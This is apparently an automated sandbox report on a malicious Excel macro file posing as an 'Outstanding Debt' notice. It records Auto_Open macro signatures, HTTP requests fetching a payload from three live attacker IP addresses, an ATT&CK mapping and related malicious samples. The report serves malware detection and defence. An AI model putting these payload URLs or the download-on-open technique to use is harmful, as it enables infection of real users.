
Analysis Report Outstanding-Debt-1840996632-05042021.xlsm

Overview

General Information

Sample Name: Outstanding-Debt-1840996632-05042021.xlsm
Analysis ID: 404162
MD5: 0276be45120eeb640587451db55759cb
SHA1: 51424cff72ecb039f78d5005a03ec2882a96d7dd
SHA256: 06c9a8f5da75ebc77f7528ceb2797050ba17cc2c7e36467b0d259d4f48dbbcbf

Detection

Hidden Macro 4.0
Score: 60
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malicious Excel 4.0 Macro
Document contains an embedded VBA macro which may execute processes
Document exploit detected (UrlDownloadToFile)
Found Excel 4.0 Macro with suspicious formulas
Allocates a big amount of memory (probably used for heap spraying)
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Uses a known web browser user agent for HTTP communication

Startup

  • System is w10x64
  • EXCEL.EXE (PID: 1268 cmdline: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding MD5: 5D6638F2C8F8571C593999C58866007E)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

No Sigma rule has matched

Signature Overview

Software Vulnerabilities:

Document exploit detected (UrlDownloadToFile)
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE; Section loaded: unknown origin: URLDownloadToFileA
Source: excel.exe; Memory has grown: Private usage: 1MB later: 83MB
Source: global traffic; TCP traffic: 192.168.2.3:49718 -> 185.183.99.115:80
Source: global traffic; HTTP traffic detected: GET /44313,6048108796.dat HTTP/1.1; Accept: */*; Accept-Encoding: gzip, deflate; User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729); Host: 185.183.99.115; Connection: Keep-Alive
Source: global traffic; HTTP traffic detected: GET /44313,6048108796.dat HTTP/1.1; Accept: */*; Accept-Encoding: gzip, deflate; User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729); Host: 51.89.73.159; Connection: Keep-Alive
Source: global traffic; HTTP traffic detected: GET /44313,6048108796.dat HTTP/1.1; Accept: */*; Accept-Encoding: gzip, deflate; User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729); Host: 190.14.37.38; Connection: Keep-Alive
Source: unknown; TCP traffic detected without corresponding DNS query: 185.183.99.115
Source: unknown; TCP traffic detected without corresponding DNS query: 51.89.73.159
Source: unknown; TCP traffic detected without corresponding DNS query: 190.14.37.38

System Summary:

Found malicious Excel 4.0 Macro
Source: Outstanding-Debt-1840996632-05042021.xlsm; Initial sample: urlmon
Document contains an embedded VBA macro which may execute processes
Source: VBA code instrumentation; OLE, VBA macro: Module Blasr, Function Auto_Open, API Microsoft Excel:Application.Run(:Range); Name: Auto_Open
Found Excel 4.0 Macro with suspicious formulas
Source: Outstanding-Debt-1840996632-05042021.xlsm; Initial sample: EXEC
Source: Outstanding-Debt-1840996632-05042021.xlsm; OLE, VBA macro line: Private Sub Auto_Open()
Source: VBA code instrumentation; OLE, VBA macro: Module Blasr, Function Auto_Open; Name: Auto_Open
Source: Outstanding-Debt-1840996632-05042021.xlsm; OLE indicator, VBA macros: true
Source: classification engine; Classification label: mal60.expl.evad.winXLSM@1/9@0/3
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE; File created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE; File created: C:\Users\user\AppData\Local\Temp\{1BDF7DCB-2EEE-42FF-962F-63FF48E04A43} - OProcSessId.dat
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE; File read: C:\Users\desktop.ini
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE; Window found: window name: SysTabControl32
Source: Window Recorder; Window detected: More than 3 window changes detected
Source: Outstanding-Debt-1840996632-05042021.xlsm; Initial sample: OLE zip file path = xl/media/image1.jpg
Source: Outstanding-Debt-1840996632-05042021.xlsm; Initial sample: OLE zip file path = xl/drawings/drawing2.xml
Source: Outstanding-Debt-1840996632-05042021.xlsm; Initial sample: OLE zip file path = xl/worksheets/_rels/sheet2.xml.rels
Source: Outstanding-Debt-1840996632-05042021.xlsm; Initial sample: OLE zip file path = xl/drawings/_rels/drawing2.xml.rels
Source: Outstanding-Debt-1840996632-05042021.xlsm; Initial sample: OLE zip file path = xl/printerSettings/printerSettings2.bin
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE; Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE; File opened: C:\Windows\SysWOW64\MSVCR100.dll
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE; Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE; Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior

Mitre Att&ck Matrix

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts | Scripting 32 | Path Interception | Extra Window Memory Injection 1 | Masquerading 1 | OS Credential Dumping | File and Directory Discovery 1 | Remote Services | Data from Local System | Exfiltration Over Other Network Medium | Non-Application Layer Protocol 1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
Default Accounts | Exploitation for Client Execution 12 | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Scripting 32 | LSASS Memory | System Information Discovery 1 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Application Layer Protocol 11 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Extra Window Memory Injection 1 | Security Account Manager | Query Registry | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Ingress Tool Transfer 1 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data

Behavior Graph


Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source | Detection | Scanner | Label | Link
Outstanding-Debt-1840996632-05042021.xlsm | 4% | ReversingLabs | Document-Office.Trojan.Heuristic |

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs


Domains and IPs

Contacted Domains

No contacted domains info

Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://185.183.99.115/44313,6048108796.dat | false | Avira URL Cloud: safe | unknown
http://51.89.73.159/44313,6048108796.dat | false | Avira URL Cloud: safe | unknown

URLs from Memory and Binaries

NameSourceMaliciousAntivirus DetectionReputation
https://api.diagnosticssdf.office.comFAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drfalse
    high
    https://login.microsoftonline.com/FAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drfalse
      high
      https://shell.suite.office.com:1443FAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drfalse
        high
        https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorizeFAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drfalse
          high
          https://autodiscover-s.outlook.com/FAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drfalse
            high
            https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=FlickrFAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drfalse
              high
              https://cdn.entity.FAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drfalse
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              unknown
              https://api.addins.omex.office.net/appinfo/queryFAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drfalse
                high
                https://clients.config.office.net/user/v1.0/tenantassociationkeyFAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drfalse
                  high
                  https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/FAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drfalse
                    high
                    https://powerlift.acompli.netFAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    unknown
                    https://rpsticket.partnerservices.getmicrosoftkey.comFAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    unknown
                    https://lookup.onenote.com/lookup/geolocation/v1FAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drfalse
                      high
                      https://cortana.aiFAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      unknown
                      https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechFAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drfalse
                        high
                        https://cloudfiles.onenote.com/upload.aspxFAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drfalse
                          high
                          https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFileFAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drfalse
                            high
                            https://entitlement.diagnosticssdf.office.comFAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drfalse
                              high
                              https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicyFAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drfalse
                                high
                                https://api.aadrm.com/FAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                unknown
                                https://ofcrecsvcapi-int.azurewebsites.net/FAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drfalse
                                • 0%, Virustotal, Browse
                                • Avira URL Cloud: safe
                                unknown
                                https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPoliciesFAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drfalse
                                  high
                                  https://api.microsoftstream.com/api/FAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drfalse
                                    high
                                    https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=ImmersiveFAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drfalse
                                      high
                                      https://cr.office.comFAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drfalse
                                        high
                                        https://portal.office.com/account/?ref=ClientMeControlFAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drfalse
                                          high
                                          https://ecs.office.com/config/v2/OfficeFAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drfalse
                                            high
                                            https://graph.ppe.windows.netFAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drfalse
                                              high
                                              https://res.getmicrosoftkey.com/api/redemptioneventsFAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              unknown
                                              https://powerlift-frontdesk.acompli.netFAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              unknown
                                              https://tasks.office.comFAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drfalse
                                                high
                                                https://officeci.azurewebsites.net/api/FAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drfalse
                                                • 0%, Virustotal, Browse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://sr.outlook.office.net/ws/speech/recognize/assistant/workFAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drfalse
                                                  high
                                                  https://store.office.cn/addinstemplateFAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  unknown
                                                  https://outlook.office.com/autosuggest/api/v1/init?cvid=FAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drfalse
                                                    high
                                                    https://globaldisco.crm.dynamics.comFAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drfalse
                                                      high
                                                      https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechFAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drfalse
                                                        high
                                                        https://store.officeppe.com/addinstemplateFAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://dev0-api.acompli.net/autodetectFAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://www.odwebp.svc.msFAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://api.powerbi.com/v1.0/myorg/groupsFAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drfalse
                                                          high
                                                          https://web.microsoftstream.com/video/FAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drfalse
                                                            high
                                                            https://graph.windows.netFAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drfalse
                                                              high
                                                              https://dataservice.o365filtering.com/FAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              unknown
                                                              https://officesetup.getmicrosoftkey.comFAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              unknown
                                                              https://analysis.windows.net/powerbi/apiFAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drfalse
                                                                high
                                                                https://prod-global-autodetect.acompli.net/autodetectFAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                unknown
                                                                https://outlook.office365.com/autodiscover/autodiscover.jsonFAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drfalse
                                                                  high
                                                                  https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-iosFAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drfalse
                                                                    high
                                                                    https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechFAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drfalse
                                                                      high
                                                                      https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.jsonFAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drfalse
                                                                        high
                                                                        https://ncus.contentsync.FAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drfalse
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        unknown
                                                                        https://onedrive.live.com/about/download/?windows10SyncClientInstalled=falseFAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drfalse
                                                                          high
                                                                          https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/FAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drfalse
                                                                            high
                                                                            http://weather.service.msn.com/data.aspxFAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drfalse
                                                                              high
                                                                              https://apis.live.net/v5.0/FAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drfalse
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              unknown
                                                                              https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asksFAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drfalse
                                                                                high
                                                                                https://word.uservoice.com/forums/304948-word-for-ipad-iphone-iosFAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drfalse
                                                                                  high
                                                                                  https://autodiscover-s.outlook.com/autodiscover/autodiscover.xmlFAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drfalse
                                                                                    high
                                                                                    https://management.azure.comFAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drfalse
                                                                                      high
                                                                                      https://wus2.contentsync.FAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drfalse
                                                                                      • URL Reputation: safe
                                                                                      • URL Reputation: safe
                                                                                      • URL Reputation: safe
                                                                                      • URL Reputation: safe
                                                                                      unknown
                                                                                      https://incidents.diagnostics.office.comFAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drfalse
                                                                                        high
                                                                                        https://clients.config.office.net/user/v1.0/iosFAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drfalse
                                                                                          high
                                                                                          https://insertmedia.bing.office.net/odc/insertmediaFAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drfalse
                                                                                            high
                                                                                            https://o365auditrealtimeingestion.manage.office.comFAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drfalse
                                                                                              high
                                                                                              https://outlook.office365.com/api/v1.0/me/ActivitiesFAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drfalse
                                                                                                high
                                                                                                https://api.office.netFAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drfalse
                                                                                                  high
Name | Source | Malicious | Antivirus Detection | Reputation
https://incidents.diagnosticssdf.office.com | FAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.dr | false | | high
https://asgsmsproxyapi.azurewebsites.net/ | FAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.dr | false | Avira URL Cloud: safe | unknown
https://clients.config.office.net/user/v1.0/android/policies | FAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.dr | false | | high
https://entitlement.diagnostics.office.com | FAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.dr | false | | high
https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json | FAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.dr | false | | high
https://outlook.office.com/ | FAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.dr | false | | high
https://storage.live.com/clientlogs/uploadlocation | FAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.dr | false | | high
https://templatelogging.office.com/client/log | FAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.dr | false | | high
https://outlook.office365.com/ | FAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.dr | false | | high
https://webshell.suite.office.com | FAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.dr | false | | high
https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive | FAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.dr | false | | high
https://management.azure.com/ | FAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.dr | false | | high
https://login.windows.net/common/oauth2/authorize | FAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.dr | false | | high
https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile | FAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.dr | false | URL Reputation: safe (3x) | unknown
https://graph.windows.net/ | FAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.dr | false | | high
https://api.powerbi.com/beta/myorg/imports | FAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.dr | false | | high
https://devnull.onenote.com | FAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.dr | false | | high
https://ncus.pagecontentsync. | FAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.dr | false | URL Reputation: safe (3x) | unknown
https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json | FAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.dr | false | | high
https://messaging.office.com/ | FAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.dr | false | | high
https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile | FAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.dr | false | | high
https://augloop.office.com/v2 | FAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.dr | false | | high
https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing | FAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.dr | false | | high
https://skyapi.live.net/Activity/ | FAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.dr | false | URL Reputation: safe (3x) | unknown
https://clients.config.office.net/user/v1.0/mac | FAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.dr | false | | high
https://dataservice.o365filtering.com | FAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.dr | false | URL Reputation: safe (3x) | unknown
https://api.cortana.ai | FAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.dr | false | URL Reputation: safe (3x) | unknown
https://onedrive.live.com | FAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.dr | false | | high
https://ovisualuiapp.azurewebsites.net/pbiagave/ | FAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.dr | false | Avira URL Cloud: safe | unknown
https://visio.uservoice.com/forums/368202-visio-on-devices | FAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.dr | false | | high
https://directory.services. | FAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.dr | false | URL Reputation: safe (3x) | unknown

Contacted IPs

Public

IP | Domain | Country | ASN | ASN Name | Malicious
185.183.99.115 | unknown | Netherlands | 60117 | HSAE | false
51.89.73.159 | unknown | France | 16276 | OVHFR | false
190.14.37.38 | unknown | Panama | 52469 | OffshoreRacksSAPA | false

General Information

Joe Sandbox Version: 32.0.0 Black Diamond
Analysis ID: 404162
Start date: 04.05.2021
Start time: 19:11:59
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 4m 56s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: Outstanding-Debt-1840996632-05042021.xlsm
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Run name: Potential for more IOCs and behavior
Number of analysed new started processes: 25
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• GSI enabled (VBA)
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal60.expl.evad.winXLSM@1/9@0/3
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .xlsm
• Found Word or Excel or PowerPoint or XPS Viewer
• Attach to Office via COM
• Scroll down
• Close Viewer
Warnings:
• Excluded IPs from analysis (whitelisted): 13.88.21.125, 104.42.151.234, 92.122.145.220, 52.109.32.63, 52.109.88.37, 52.109.8.24, 13.64.90.137, 168.61.161.212, 23.57.80.111, 20.82.210.154, 92.122.213.194, 92.122.213.247, 205.185.216.10, 205.185.216.42, 20.54.26.129
• Excluded domains from analysis (whitelisted): prod-w.nexus.live.com.akadns.net, arc.msn.com.nsatc.net, store-images.s-microsoft.com-c.edgekey.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, e12564.dspb.akamaiedge.net, audownload.windowsupdate.nsatc.net, au.download.windowsupdate.com.hwcdn.net, nexus.officeapps.live.com, arc.trafficmanager.net, officeclient.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, skypedataprdcolwus17.cloudapp.net, fs.microsoft.com, prod.configsvc1.live.com.akadns.net, ris-prod.trafficmanager.net, skypedataprdcolcus17.cloudapp.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, cds.d2s7q6s2.hwcdn.net, ris.api.iris.microsoft.com, store-images.s-microsoft.com, config.officeapps.live.com, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus15.cloudapp.net, skypedataprdcolwus16.cloudapp.net, europe.configsvc1.live.com.akadns.net
• Report size getting too big, too many NtSetInformationFile calls found.

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

Match | Associated Sample Name / URL | Detection | Context
185.183.99.115 | Outstanding-Debt-610716193-05042021.xlsm | malicious | 185.183.99.115/44313,6048108796.dat
185.183.99.115 | Outstanding-Debt-1840996632-05042021.xlsm | malicious | 185.183.99.115/44313,6048108796.dat
51.89.73.159 | Outstanding-Debt-610716193-05042021.xlsm | malicious | 51.89.73.159/44313,6048108796.dat
51.89.73.159 | Outstanding-Debt-1840996632-05042021.xlsm | malicious | 51.89.73.159/44313,6048108796.dat
190.14.37.38 | Outstanding-Debt-610716193-05042021.xlsm | malicious | 190.14.37.38/44313,6048108796.dat
190.14.37.38 | Outstanding-Debt-1840996632-05042021.xlsm | malicious | 190.14.37.38/44313,6048108796.dat

Domains

No context

ASN

Match | Associated Sample Name / URL | Detection | Context
OffshoreRacksSAPA | Outstanding-Debt-610716193-05042021.xlsm | malicious | 190.14.37.38
OffshoreRacksSAPA | Outstanding-Debt-1840996632-05042021.xlsm | malicious | 190.14.37.38
OffshoreRacksSAPA | Complaint-1770799750-04302021.xlsm | malicious | 190.14.37.36
OffshoreRacksSAPA | Complaint-1770799750-04302021.xlsm | malicious | 190.14.37.36
OffshoreRacksSAPA | Complaint-1505499457-04302021.xlsm | malicious | 190.14.37.36
OffshoreRacksSAPA | Complaint-1770799750-04302021.xlsm | malicious | 190.14.37.36
OffshoreRacksSAPA | Complaint-1505499457-04302021.xlsm | malicious | 190.14.37.36
OffshoreRacksSAPA | Complaint-1505499457-04302021.xlsm | malicious | 190.14.37.36
OffshoreRacksSAPA | Complaint-937314470-04302021.xlsm | malicious | 190.14.37.36
OffshoreRacksSAPA | Complaint-937314470-04302021.xlsm | malicious | 190.14.37.36
OffshoreRacksSAPA | Complaint-793844517-04302021.xlsm | malicious | 190.14.37.36
OffshoreRacksSAPA | Complaint-937314470-04302021.xlsm | malicious | 190.14.37.36
OffshoreRacksSAPA | Complaint-793844517-04302021.xlsm | malicious | 190.14.37.36
OffshoreRacksSAPA | Complaint-793844517-04302021.xlsm | malicious | 190.14.37.36
OffshoreRacksSAPA | Cancellation-419022185-04292021.xlsm | malicious | 190.14.37.27
OffshoreRacksSAPA | Cancellation-419022185-04292021.xlsm | malicious | 190.14.37.27
OffshoreRacksSAPA | Cancellation-419022185-04292021.xlsm | malicious | 190.14.37.27
OffshoreRacksSAPA | 284225b9_by_Libranalysis.xlsm | malicious | 190.14.37.252
OffshoreRacksSAPA | 284225b9_by_Libranalysis.xlsm | malicious | 190.14.37.252
                                                                                                                                                284225b9_by_Libranalysis.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 190.14.37.252
                                                                                                                                                HSAEOutstanding-Debt-610716193-05042021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 185.183.99.115
                                                                                                                                                Outstanding-Debt-1840996632-05042021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 185.183.99.115
                                                                                                                                                9177284661-04302021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 185.45.193.80
                                                                                                                                                9177284661-04302021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 185.45.193.80
                                                                                                                                                9177284661-04302021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 185.45.193.80
                                                                                                                                                24e5ce5d_by_Libranalysis.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 185.198.57.121
                                                                                                                                                24e5ce5d_by_Libranalysis.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 185.198.57.121
                                                                                                                                                24e5ce5d_by_Libranalysis.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 185.198.57.121
                                                                                                                                                kVXWdr5oFQ.exeGet hashmaliciousBrowse
                                                                                                                                                • 185.183.96.36
